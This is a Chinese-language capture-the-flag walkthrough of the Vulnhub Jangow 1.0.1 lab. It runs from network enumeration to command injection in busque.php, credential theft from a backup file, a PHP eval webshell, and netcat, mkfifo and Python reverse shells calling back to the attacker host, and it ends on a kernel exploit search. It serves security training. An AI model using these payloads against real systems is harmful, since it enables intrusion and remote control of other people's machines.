Jangow
作者: jason_huawen
靶机信息
名称:Jangow: 1.0.1
地址:
识别目标主机IP地址
(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:c5:cf:d9 1 60 PCS Systemtechnik GmbH
192.168.56.118 08:00:27:5e:21:88 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.118
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.118 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-31 20:56 EST
Nmap scan report for 192.168.56.118
Host is up (0.00032s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18
|_http-title: Index of /
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2021-06-10 18:05 site/
|_
MAC Address: 08:00:27:5E:21:88 (Oracle VirtualBox virtual NIC)
Service Info: Host: 127.0.0.1; OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.06 seconds
NMAP扫描结果表明目标主机有2个开放端口:21(FTP)、80(HTTP)
获得Shell
FTP
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ searchsploit vsFTPd 3.0.3
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 3.0.3 - Remote Denial of Service | multiple/remote/49719.py
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
-
不允许匿名访问
-
目标主机FTP版本没有可利用的漏洞
HTTP
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ nikto -h http://192.168.56.118
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.118
+ Target Hostname: 192.168.56.118
+ Target Port: 80
+ Start Time: 2022-12-31 21:02:03 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /: Directory indexing found.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /./: Directory indexing found.
+ /./: Appending '/./' to a directory allows indexing
+ OSVDB-3268: //: Directory indexing found.
+ //: Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.
+ OSVDB-3268: /%2e/: Directory indexing found.
+ OSVDB-576: /%2e/: Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. http://www.securityfocus.com/bid/2513.
+ OSVDB-3268: ///: Directory indexing found.
+ OSVDB-119: /?PageServices: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269.
+ OSVDB-119: /?wp-cs-dump: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269.
+ OSVDB-3268: ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Directory indexing found.
+ OSVDB-3288: ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Abyss 1.03 reveals directory listing when /'s are requested.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time: 2022-12-31 21:02:53 (GMT-5) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ nikto -h http://192.168.56.118/site/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.118
+ Target Hostname: 192.168.56.118
+ Target Port: 80
+ Start Time: 2022-12-31 21:03:18 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /site/, inode: 27ce, size: 5c46fbf4bb499, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /site/css/: Directory indexing found.
+ OSVDB-3092: /site/css/: This might be interesting...
+ 7916 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2022-12-31 21:04:04 (GMT-5) (46 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nikto工具没有扫描到可利用的目录或者漏洞。
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ dirb http://192.168.56.118
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Dec 31 21:05:07 2022
URL_BASE: http://192.168.56.118/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.118/ ----
+ http://192.168.56.118/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.118/site/
---- Entering directory: http://192.168.56.118/site/ ----
==> DIRECTORY: http://192.168.56.118/site/assets/
==> DIRECTORY: http://192.168.56.118/site/css/
+ http://192.168.56.118/site/index.html (CODE:200|SIZE:10190)
==> DIRECTORY: http://192.168.56.118/site/js/
==> DIRECTORY: http://192.168.56.118/site/wordpress/
---- Entering directory: http://192.168.56.118/site/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.118/site/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.118/site/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.118/site/wordpress/ ----
+ http://192.168.56.118/site/wordpress/index.html (CODE:200|SIZE:10190)
-----------------
END_TIME: Sat Dec 31 21:05:10 2022
DOWNLOADED: 13836 - FOUND: 3
在site/目录下发现了wordpress目录
用浏览器访问/site/worpress目录,返回内容不是典型的worpress站点,不管怎样,可以用wpscan确认一下:
──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ wpscan --url http://192.168.56.118/site/wordpress -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
Scan Aborted: The remote website is up, but does not seem to be running WordPress.
wpscan工具扫描结果表明目标主机确实没有运行wordpress,只是普通的目录而已。
──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ gobuster dir -u http://192.168.56.118 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.118
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/31 21:09:03 Starting gobuster in directory enumeration mode
===============================================================
/site (Status: 301) [Size: 315] [--> http://192.168.56.118/site/]
/server-status (Status: 403) [Size: 279]
Progress: 216119 / 220561 (97.99%)===============================================================
2022/12/31 21:09:24 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ gobuster dir -u http://192.168.56.118 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.118
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,js,sh,txt
[+] Timeout: 10s
===============================================================
2022/12/31 21:09:37 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/site (Status: 301) [Size: 315] [--> http://192.168.56.118/site/]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1322084 / 1323366 (99.90%)===============================================================
2022/12/31 21:11:49 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ gobuster dir -u http://192.168.56.118/site/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.118/site/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: js,sh,txt,php,html
[+] Timeout: 10s
===============================================================
2022/12/31 21:12:21 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10190]
/assets (Status: 301) [Size: 322] [--> http://192.168.56.118/site/assets/]
/css (Status: 301) [Size: 319] [--> http://192.168.56.118/site/css/]
/wordpress (Status: 301) [Size: 325] [--> http://192.168.56.118/site/wordpress/]
/js (Status: 301) [Size: 318] [--> http://192.168.56.118/site/js/]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
Progress: 1319465 / 1323366 (99.71%)===============================================================
2022/12/31 21:14:39 Finished
===============================================================
Gobuster工具没有扫描出有价值的目录或者文件。
但是我们注意到在访问首页时,有个链接,访问该链接,返回是空白页面
http://192.168.56.118/site/busque.php?buscar=
会不会有本地文件包含漏洞?
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ curl http://192.168.56.118/site/busque.php?buscar=../../../../../../etc/passwd
没有返回内容,会不会是命令执行?
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ curl http://192.168.56.118/site/busque.php?buscar=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
浏览器访问:
──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ curl http://192.168.56.118/site/busque.php?buscar=which%20nc
/bin/nc
http://192.168.56.118/site/busque.php?buscar=nc%20-e%20/bin/bash%20192.168.56.206%205555
没有得到反弹的shell
尝试各种shell命令都没有成功执行,看来还是利用已知可执行的命令获取主机的更多信息:
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ curl http://192.168.56.118/site/busque.php?buscar=cat%20/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
jangow01:x:1000:1000:desafio02,,,:/home/jangow01:/bin/bash
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:111:118:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:112:119:MySQL Server,,,:/nonexistent:/bin/false
可知用户名为jang0w01
看有没有私钥:
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ curl http://192.168.56.118/site/busque.php?buscar=cat%20/home/jangow01/.ssh/id_rsa
没有发现私钥文件。
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ curl http://192.168.56.118/site/busque.php?buscar=ls%20-alh%20/var/www/html/
total 16K
drwxr-xr-x 3 root root 4.0K Oct 31 2021 .
drwxr-xr-x 3 root root 4.0K Oct 31 2021 ..
-rw-r--r-- 1 www-data www-data 336 Oct 31 2021 .backup
drwxr-xr-x 6 www-data www-data 4.0K Jun 10 2021 site
利用ls -alh命令列出/var/www/html目录,发现有个.backup隐藏文件,看是否可以看到其内容?
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ curl http://192.168.56.118/site/busque.php?buscar=cat%20%20/var/www/html/.backup
$servername = "localhost";
$database = "jangow01";
$username = "jangow01";
$password = "abygurl69";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);
但是目标主机并没有开放ssh服务,看能不用用这里的用户名密码登录FTP
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:kali): jangow01
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||51742|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Oct 31 2021 .
drwxr-xr-x 14 0 0 4096 Jun 10 2021 ..
drwxr-xr-x 3 0 0 4096 Oct 31 2021 html
226 Directory send OK.
ftp>
发现就是网站的目录,那是不是可以将shell.php文件上传至该目录?
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:kali): jangow01
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||51742|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Oct 31 2021 .
drwxr-xr-x 14 0 0 4096 Jun 10 2021 ..
drwxr-xr-x 3 0 0 4096 Oct 31 2021 html
226 Directory send OK.
ftp> ls
229 Entering Extended Passive Mode (|||25840|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Oct 31 2021 html
226 Directory send OK.
ftp> cd html
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||58150|)
150 Here comes the directory listing.
drwxr-xr-x 6 33 33 4096 Jun 10 2021 site
226 Directory send OK.
ftp> cd site
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||35486|)
150 Here comes the directory listing.
drwxr-xr-x 6 33 33 4096 Jun 10 2021 .
drwxr-xr-x 3 0 0 4096 Oct 31 2021 ..
drwxr-xr-x 3 33 33 4096 Jun 03 2021 assets
-rw-r--r-- 1 33 33 35 Jun 10 2021 busque.php
drwxr-xr-x 2 33 33 4096 Jun 03 2021 css
-rw-r--r-- 1 33 33 10190 Jun 10 2021 index.html
drwxr-xr-x 2 33 33 4096 Jun 03 2021 js
drwxr-xr-x 2 33 33 4096 Jun 10 2021 wordpress
226 Directory send OK.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||64287|)
553 Could not create file.
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||8893|)
150 Here comes the directory listing.
drwxr-xr-x 6 33 33 4096 Jun 10 2021 site
226 Directory send OK.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||37557|)
553 Could not create file.
ftp> ls
229 Entering Extended Passive Mode (|||20630|)
150 Here comes the directory listing.
drwxr-xr-x 6 33 33 4096 Jun 10 2021 site
226 Directory send OK.
ftp> cd site
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||23339|)
150 Here comes the directory listing.
drwxr-xr-x 3 33 33 4096 Jun 03 2021 assets
-rw-r--r-- 1 33 33 35 Jun 10 2021 busque.php
drwxr-xr-x 2 33 33 4096 Jun 03 2021 css
-rw-r--r-- 1 33 33 10190 Jun 10 2021 index.html
drwxr-xr-x 2 33 33 4096 Jun 03 2021 js
drwxr-xr-x 2 33 33 4096 Jun 10 2021 wordpress
226 Directory send OK.
ftp> cd assets
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||19504|)
150 Here comes the directory listing.
-rw-r--r-- 1 33 33 23462 Jun 03 2021 favicon.ico
drwxr-xr-x 2 33 33 4096 Jun 03 2021 img
226 Directory send OK.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||51542|)
553 Could not create file.
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||5801|)
150 Here comes the directory listing.
drwxr-xr-x 3 33 33 4096 Jun 03 2021 assets
-rw-r--r-- 1 33 33 35 Jun 10 2021 busque.php
drwxr-xr-x 2 33 33 4096 Jun 03 2021 css
-rw-r--r-- 1 33 33 10190 Jun 10 2021 index.html
drwxr-xr-x 2 33 33 4096 Jun 03 2021 js
drwxr-xr-x 2 33 33 4096 Jun 10 2021 wordpress
226 Directory send OK.
ftp> cd wordpress
250 Directory successfully changed.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||52179|)
553 Could not create file.
ftp> cd js
550 Failed to change directory.
ftp> ls
229 Entering Extended Passive Mode (|||35443|)
150 Here comes the directory listing.
-rw-r--r-- 1 33 33 347 Jun 10 2021 config.php
-rw-r--r-- 1 33 33 10190 Jun 10 2021 index.html
226 Directory send OK.
ftp> get config.php
local: config.php remote: config.php
229 Entering Extended Passive Mode (|||22735|)
150 Opening BINARY mode data connection for config.php (347 bytes).
100% |*********************************************************************************| 347 0.69 KiB/s 00:00 ETA
226 Transfer complete.
347 bytes received in 00:00 (0.69 KiB/s)
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||41140|)
150 Here comes the directory listing.
drwxr-xr-x 3 33 33 4096 Jun 03 2021 assets
-rw-r--r-- 1 33 33 35 Jun 10 2021 busque.php
drwxr-xr-x 2 33 33 4096 Jun 03 2021 css
-rw-r--r-- 1 33 33 10190 Jun 10 2021 index.html
drwxr-xr-x 2 33 33 4096 Jun 03 2021 js
drwxr-xr-x 2 33 33 4096 Jun 10 2021 wordpress
226 Directory send OK.
ftp> cd wordpress
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||28848|)
150 Here comes the directory listing.
-rw-r--r-- 1 33 33 347 Jun 10 2021 config.php
-rw-r--r-- 1 33 33 10190 Jun 10 2021 index.html
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||26559|)
150 Here comes the directory listing.
drwxr-xr-x 3 33 33 4096 Jun 03 2021 assets
-rw-r--r-- 1 33 33 35 Jun 10 2021 busque.php
drwxr-xr-x 2 33 33 4096 Jun 03 2021 css
-rw-r--r-- 1 33 33 10190 Jun 10 2021 index.html
drwxr-xr-x 2 33 33 4096 Jun 03 2021 js
drwxr-xr-x 2 33 33 4096 Jun 10 2021 wordpress
226 Directory send OK.
ftp> cd css
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||20319|)
150 Here comes the directory listing.
-rw-r--r-- 1 33 33 207746 Jun 03 2021 styles.css
226 Directory send OK.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||59898|)
553 Could not create file.
ftp> cd ..
250 Directory successfully changed.
ftp>
发现没有权限上传文件到FTP目录。
现在关键是要得到shell,看来通过执行nc, Python等命令无法实现该目的,可以用echo方法生成shell.php,然后访问该shell.php
192.168.56.118/site/busque.php?buscar=echo '' > jason.php
验证是否上传成功?
┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ curl http://192.168.56.118/site/busque.php?buscar=ls
assets
busque.php
css
index.html
jason.php
js
shell.php
wordpress
192.168.56.118/site/busque.php?buscar=echo '<?php eval($_POST["cmd"]); ?>' > shell.php
http://192.168.56.118/site/busque.php?buscar=echo '' > shell.php
http://192.168.56.118/site/busque.php?buscar=echo%20%27%3C?php%20eval($_POST[%22cmd%22]);%20?%3E%27%20%3E%20shell.php
调试了很久,还是用Linux版本的蚁剑连接到这个shell.php
但是这是webshell, 想反弹会一个shell,报错靶机的nc不支持-e选项
www-data:/var/www/html/site) $ echo '<?php system("mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.206 443 >/tmp/f");?>' > rev.php
(www-data:/var/www/html/site) $ ls
assets
busque.php
css
index.html
js
shell.php
wordpress
(www-data:/var/www/html/site) $ ls -alh
total 44K
drwxr-xr-x 6 www-data www-data 4.0K Nov 26 08:05 .
drwxr-xr-x 3 root root 4.0K Oct 31 2021 ..
drwxr-xr-x 3 www-data www-data 4.0K Jun 3 2021 assets
-rw-r--r-- 1 www-data www-data 35 Jun 10 2021 busque.php
drwxr-xr-x 2 www-data www-data 4.0K Jun 3 2021 css
-rw-r--r-- 1 www-data www-data 10K Jun 10 2021 index.html
drwxr-xr-x 2 www-data www-data 4.0K Jun 3 2021 js
-rw-r--r-- 1 www-data www-data 30 Nov 26 08:15 shell.php
drwxr-xr-x 2 www-data www-data 4.0K Jun 10 2021 wordpress
(www-data:/var/www/html/site) $ pwd
/var/www/html/site
(www-data:/var/www/html/site) $ python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.56.206',443));"
ret=2
(www-data:ret=2) $ touch 111.php
/bin/sh: 1: cd: can't cd to ret=2
不能像普通场景,用echo方式创建文件,而是用蚁剑本身的文件管理器创建文件,并编辑文件内容
www-data:/var/www/html/site) $ ls
111.php
assets
busque.php
css
index.html
js
reverse.php
shell.php
wordpress
现在用浏览器访问reverse.php,注意反弹回的端口只能是443,因为靶机有防火墙
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ sudo nc -nlvp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.118] 44358
Linux jangow01 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
09:16:54 up 1:30, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@jangow01:/$ cd /home
cd /home
www-data@jangow01:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Oct 31 2021 .
drwxr-xr-x 24 root root 4.0K Jun 10 2021 ..
drwxr-xr-x 4 jangow01 desafio02 4.0K Jun 10 2021 jangow01
www-data@jangow01:/home$ cd jangow01
cd jangow01
www-data@jangow01:/home/jangow01$ cd /tmp
cd /tmp
──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ searchsploit kernel 4.4.0-31
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
Android Kernel < 4.8 - ptrace seccomp Filter Bypass | android/dos/46434.c
Apple iOS < 10.3.1 - Kernel | ios/local/42555.txt
Apple Mac OSX < 10.6.7 - Kernel Panic (Denial of Service) | osx/dos/17901.c
Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Refere | macos/local/40956.c
Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Refere | macos/local/40956.c
Apple macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged | macos/local/40957.c
Apple macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrec | multiple/dos/40955.txt
Apple macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrec | multiple/dos/40955.txt
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Out-of-Bounds Write Privilege Escalation | windows/local/42625.py
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation ( | windows/local/42624.py
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation ( | windows/local/42665.py
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation | solaris/local/15962.c
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_ | linux/local/9479.c
Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation | linux/local/50135.c
Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local Privilege Escalation | linux/local/41995.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Priv | windows_x86-64/local/47170.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation | linux/local/41886.c
Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service | linux/dos/42136.c
Linux kernel < 4.10.15 - Race Condition Privilege Escalation | linux/local/43345.c
Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation | linux/local/45553.c
Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC) | linux/dos/42762.txt
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.14.rc3 - Local Denial of Service | linux/dos/42932.c
Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak | linux/local/44325.c
Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption | linux/dos/44832.txt
Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free | linux/dos/44579.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KAS | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privi | linux/local/47169.c
Linux Kernel < 4.5.1 - Off-By-One (PoC) | linux/dos/44301.c
macOS < 10.14.3 / iOS < 12.1.3 - Kernel Heap Overflow in PF_KEY due to Lack of Bounds Check | multiple/dos/46300.c
